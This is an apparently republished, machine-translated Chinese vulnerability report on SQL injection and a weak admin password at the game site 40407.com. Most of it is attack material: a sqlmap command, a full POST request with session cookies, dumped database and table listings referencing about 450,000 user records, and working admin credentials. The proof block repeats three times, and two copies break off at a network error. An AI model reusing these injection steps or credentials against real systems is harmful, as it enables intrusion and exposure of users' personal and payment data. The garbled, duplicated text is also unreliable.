游戏安全之40407游戏网某处SQL注入(涉及50w用户信息)+某系统弱口令
漏洞标题 游戏安全之40407游戏网某处SQL注入(涉及50w用户信息)+某系统弱口令 相关厂商 40407.com 漏洞作者 黑色键盘丶 提交时间 2016-04-28 09:09 公开时间 201…
漏洞标题
游戏安全40407游戏网络某处SQL注入(涉及50w用户信息)+系统弱密码
相关制造商
40407.com
漏洞作者
黑色键盘丶
提交时间
2016-04-28 09: 09
公共时间
2016-06-12 11: 00
漏洞类型
SQL注入漏洞
危险等级
高
自我评估等级
20
漏洞状态
制造商已确认
标签标签
Php +数字式注射,注射技术
漏洞详细信息
后注入语法:sqlmap.py -r 1.txt --dbs注入参数sid
=====================post_package========================
POST /index.php?c=pay&a=testgamerole HTTP/1.1
主机: wan.40407.com
代理连接:保持活动状态
内容长度: 36
接受: */*
原点:http://wan.40407.com
X-Requested-With: XMLHttpRequest
用户代理: Mozilla/5.0(Windows NT 6.1; WOW64)AppleWebKit/537.36(KHTML,与Gecko一样)Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
内容类型: application/x-www-form-urlencoded;字符集=UTF-8
Referer:http://wan.40407.com/index.php?c=pay&pt=pt
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh; q=0.8
Cookie: PHPSESSID=2f0313d49c83605b7c6c8d80cb40c971; _yd_=GA1.2.478994187.1461769909; Hm_lvt_e2dde3f9ab03af73ad54a2cc879b4fc8=1461769909,1461770157,1461770180,1461774259; Hm_lpvt_e2dde3f9ab03af73ad54a2cc879b4fc8=1461774398; DedeUserID=1988819; DedeUserID__ckMd5=e296d0b0648a8b88; DedeLoginTime=1461774649; DedeLoginTime__ckMd5=27c8d38a4bf65d3d; wanuserid=czo4OiJoZWlzZTEyMyI7; wanmember_mid=czo1OiI5NzMyNCI7; wansafe_pw=czozMjoiNDI5N2Y0NGIxMzk1NTIzNTI0NWIyNDk3Mzk5ZDdhOTMiOw%3D%3D; wansafe_yz=aToxOw%3D%3D
名=heise123&安培; GID=5&安培; SID=32&安培; isyk=
数据库信息
可用数据库[25]:
[*]`14x`
[*]`399wantg`
[*]`40407box_test`
[*]`40407box`
[*]`40407boxpt_test`
[*]`40407boxpt`
[*]`40407boxstat`
[*]`40407data`
[*]`40407kfz`
[*]`40407lol`
[*]`40407tqyt`
[*]`dkwdv {`
[*]`kp.ya58.cn`
[*]`s} \ x1a!\ x03!`
[*]`ucentir)\ x11`
[*]`xiro7!`
[*] bcgua
[*] information_schema
[*] mysql
[*] percona
[*] performance_schema
[*] projeit
[*] smweb
[*] testcy
[*]团
当前库表信息
数据库: 40407boxpt
+ ---------------------- + --------- +
|表|参赛作品|
+ ---------------------- + --------- +
| box_game_tg_data | 761184 |
| box_game_member | 450339 |
| box_gamecard_sn | 280019 |
| box_pay | 22280 |
| box_score_record | 4632 |
| box_score_playinfo | 4016 |
| box_member_mac | 3041 |
| box_content_1 | 2220 |
| box_content_1_extend | 1900年|
| box_score_rule | 1306 |
| box_pk_username | 1074 |
| box_game_server | 650 |
| box_content_1_item | 576 |
| box_jf_pay | 479 |
| box_tag | 236 |
| box_admin_user | 227 |
| box_score_game | 160 |
| box_content_1_sjsg | 139 |
| box_score_pay | 139 |
| box_category | 131 |
| box_content_1_jjsg | 125 |
| box_content_1_sjtl | 90 |
| box_content_1_hero | 67 |
| box_content_1_zwx | 67 |
| box_content_1_nslm | 55 |
| box_model | 35 |
| box_model_field | 35 |
| box_game | 34 |
| box_content_1_rxsg2 | 32 |
| box_content_1_jyjh | 29 |
| box_content_1_ocean | 26 |
| box_content_1_hwsg | 25 |
| box_content_1_mycs | 25 |
| box_user_tg | 24 |
| box_pay_cycle | 23 |
| box_linkage | 18 |
| box_ad | 16 |
| box_content_1_jyjx | 16 |
| box_pk_game | 13 |
| box_pk_number | 13 |
| box_content | 12 |
| box_gid_modelid | 10 |
| box_pingtaibi_fanli | 10 |
| box_pk_rule | 10 |
| box_content_1_bztx | 8 |
| box_plugin | 6 |
| box_content_1_smzt | 5 |
| box_member_group | 5 |
| box_admin_group | 4 |
| box_content_1_jz | 4 |
| box_content_1_rxsg | 4 |
| box_role | 4 |
| box_content_1_mjll | 3 |
| box_wan_top_gg | 3 |
| box_content_1_dsg | 2 |
| box_content_1_game | 2 |
| box_content_1_swydn | 2 |
| box_content_1_xbjz | 2 |
+ ---------------------- + --------- +
-------------------------------------
数据库: 40407boxpt 45w用户信息
+ ----------------- + --------- +
|表|参赛作品|
+ ----------------- + --------- +
| box_game_member | 450339 |
+ ----------------- + --------- +
超过200,000个估计卡密码信息,70多个信息,支付信息等。
由于它是延迟注入,因此它不会运行数据信息。
================================================================================
http://tg.40407.com/admin/mainindex/index admin 123456输入
可以修改游戏的促销信息。
一些用户信息
漏洞证明:
后注入语法:sqlmap.py -r 1.txt --dbs注入参数sid
=====================post_package========================
POST /index.php?c=pay&a=testgamerole HTTP/1.1
主机: wan.40407.com
代理连接:保持活动状态
内容长度: 36
接受: */*
原点:http://wan.40407.com
X-Requested-With: XMLHttpRequest
用户代理: Mozilla/5.0(Windows NT 6.1; WOW64)AppleWebKit/537.36(KHTML,与Gecko一样)Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
内容类型: application/x-www-form-urlencoded;字符集=UTF-8
Referer:http://wan.40407.com/index.php?c=pay&pt=pt
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh; q=0.8
Cookie: PHPSESSID=2f0313d49c83605b7c6c8d80cb40c971; _yd_=GA1.2.478994187.1461769909; Hm_lvt_e2dde3f9ab03af73ad54a2cc879b4fc8=1461769909,1461770157,1461770180,1461774259; Hm_lpvt_e2dde3f9ab03af73ad54a2cc879b4fc8=1461774398; DedeUserID=1988819; DedeUserID__ckMd5=e296d0b0648a8b88; DedeLoginTime=1461774649; DedeLoginTime__ckMd5=27c8d38a4bf65d3d; wanuserid=czo4OiJoZWlzZTEyMyI7; wanmember_mid=czo1OiI5NzMyNCI7; wansafe_pw=czozMjoiNDI5N2Y0NGIxMzk1NTIzNTI0NWIyNDk3Mzk5ZDdhOTMiOw%3D%3D; wansafe_yz=aToxOw%3D%3D
名=heise123&安培; GID=5&安培; SID=32&安培; isyk=
数据库信息
可用数据库[25]:
[*]`14x`
[*]`399wantg`
[*]`40407box_test`
[*]`40407box`
[*]`40407boxpt_test`
[*]`40407boxpt`
[*]`40407boxstat`
[*]`40407data`
[*]`40407kfz`
[*]`40407lol`
[*]`40407tqyt`
[*]`dkwdv {`
[*]`kp.ya58.cn`
[*]`s} \ x1a!\ x03!`
[*]`ucentir)\ x11`
[*]`xiro7!`
[*] bcgua
[*] information_schema
[*] mysql
[*] percona
[*] performance_schema
[*] projeit
[*] smweb
[*] testcy
[*]团
当前库表信息
数据库: 40407boxpt
+ ---------------------- + --------- +
|表|参赛作品|
+ ---------------------- + --------- +
| box_game_tg_data | 761184 |
| box_game_member | 450339 |
| box_gamecard_sn | 280019 |
| box_pay | 22280 |
| box_score_record | 4632 |
| box_score_playinfo | 4016 |
| box_member_mac | 3041 |
| box_content_1 | 2220 |
| box_content_1_extend | 1900年|
| box_score_rule | 1306 |
| box_pk_username | 1074 |
| box_game_server | 650 |
| box_content_1_item | 576 |
| box_jf_pay | 479 |
| box_tag | 236 |
| box_admin_user | 227 |
| box_score_game | 160 |
| box_content_1_sjsg | 139 |
| box_score_pay | 139 |
| box_category | 131 |
| box_content_1_jjsg | 125 |
| box_content_1_sjtl | 90 |
| box_content_1_hero | 67 |
| box_content_1_zwx | 67 |
| box_content_1_nslm | 55 |
| box_model | 35 |
| box_model_field | 35 |
| box_game | 34 |
| box_content_1_rxsg2 | 32 |
| box_content_1_jyjh | 29 |
| box_content_1_ocean | 26 |
| box_content_1_hwsg | 25 |
| box_content_1_mycs | 25 |
| box_user_tg | 24 |
| box_pay_cycle | 23 |
| box_linkage | 18 |
| box_ad | 16 |
| box_content_1_jyjx | 16 |
| box_pk_game | 13 |
| box_pk_number | 13 |
| box_content | 12 |
| box_gid_modelid | 10 |
| box_pingtaibi_fanli | 10 |
| box_pk_rule | 10 |
| box_content_1_bztx | 8 |
| box_plugin | 6 |
| box_content_1_smzt | 5 |
| box_member_group | 5 |
| box_admin_group | 4 |
| box_content_1_jz | 4 |
| box_content_1_rxsg | 4 |
| box_role | 4 |
| box_content_1_mjll | 3 |
| box_wan_top_gg | 3 |
| box_content_1_dsg | 2 |
| box_content_1_game | 2 |
Failure when receiving data from the peer
一些用户信息
漏洞证明:
后注入语法:sqlmap.py -r 1.txt --dbs注入参数sid
=====================post_package========================
POST /index.php?c=pay&a=testgamerole HTTP/1.1
主机: wan.40407.com
代理连接:保持活动状态
内容长度: 36
接受: */*
原点:http://wan.40407.com
X-Requested-With: XMLHttpRequest
用户代理: Mozilla/5.0(Windows NT 6.1; WOW64)AppleWebKit/537.36(KHTML,与Gecko一样)Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
内容类型: application/x-www-form-urlencoded;字符集=UTF-8
Referer:http://wan.40407.com/index.php?c=pay&pt=pt
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh; q=0.8
Cookie: PHPSESSID=2f0313d49c83605b7c6c8d80cb40c971; _yd_=GA1.2.478994187.1461769909; Hm_lvt_e2dde3f9ab03af73ad54a2cc879b4fc8=1461769909,1461770157,1461770180,1461774259; Hm_lpvt_e2dde3f9ab03af73ad54a2cc879b4fc8=1461774398; DedeUserID=1988819; DedeUserID__ckMd5=e296d0b0648a8b88; DedeLoginTime=1461774649; DedeLoginTime__ckMd5=27c8d38a4bf65d3d; wanuserid=czo4OiJoZWlzZTEyMyI7; wanmember_mid=czo1OiI5NzMyNCI7; wansafe_pw=czozMjoiNDI5N2Y0NGIxMzk1NTIzNTI0NWIyNDk3Mzk5ZDdhOTMiOw%3D%3D; wansafe_yz=aToxOw%3D%3D
名=heise123&安培; GID=5&安培; SID=32&安培; isyk=
数据库信息
可用数据库[25]:
[*]`14x`
[*]`399wantg`
[*]`40407box_test`
[*]`40407box`
[*]`40407boxpt_test`
[*]`40407boxpt`
[*]`40407boxstat`
[*]`40407data`
[*]`40407kfz`
[*]`40407lol`
[*]`40407tqyt`
[*]`dkwdv {`
[*]`kp.ya58.cn`
[*]`s} \ x1a!\ x03!`
[*]`ucentir)\ x11`
[*]`xiro7!`
[*] bcgua
[*] information_schema
[*] mysql
[*] percona
[*] performance_schema
[*] projeit
[*] smweb
[*] testcy
[*]团
当前库表信息
数据库: 40407boxpt
+ ---------------------- + --------- +
|表|参赛作品|
+ ---------------------- + --------- +
| box_game_tg_data | 761184 |
| box_game_member | 450339 |
| box_gamecard_sn | 280019 |
| box_pay | 22280 |
| box_score_record | 4632 |
| box_score_playinfo | 4016 |
| box_member_mac | 3041 |
| box_content_1 | 2220 |
| box_content_1_extend | 1900年|
| box_score_rule | 1306 |
| box_pk_username | 1074 |
| box_game_server | 650 |
| box_content_1_item | 576 |
| box_jf_pay | 479 |
| box_tag | 236 |
| box_admin_user | 227 |
| box_score_game | 160 |
| box_content_1_sjsg | 139 |
| box_score_pay | 139 |
| box_category | 131 |
| box_content_1_jjsg | 125 |
| box_content_1_sjtl | 90 |
| box_content_1_hero | 67 |
| box_content_1_zwx | 67 |
| box_content_1_nslm | 55 |
| box_model | 35 |
| box_model_field | 35 |
| box_game | 34 |
| box_content_1_rxsg2 | 32 |
| box_content_1_jyjh | 29 |
| box_content_1_ocean | 26 |
| box_content_1_hwsg | 25 |
| box_content_1_mycs | 25 |
| box_user_tg | 24 |
| box_pay_cycle | 23 |
| box_linkage | 18 |
| box_ad | 16 |
| box_content_1_jyjx | 16 |
| box_pk_game | 13 |
| box_pk_number | 13 |
| box_content | 12 |
| box_gid_modelid | 10 |
| box_pingtaibi_fanli | 10 |
| box_pk_rule | 10 |
| box_content_1_bztx | 8 |
| box_plugin | 6 |
| box_content_1_smzt | 5 |
| box_member_group | 5 |
| box_admin_group | 4 |
| box_content_1_jz | 4 |
| box_content_1_rxsg | 4 |
| box_role | 4 |
| box_content_1_mjll | 3 |
| box_wan_top_gg | 3 |
| box_content_1_dsg | 2 |
| box_content_1_game | 2 |
Failure when receiving data from the peer
- 发表于 2016-07-17 08:00
- 阅读 ( 526 )
- 分类:黑客技术
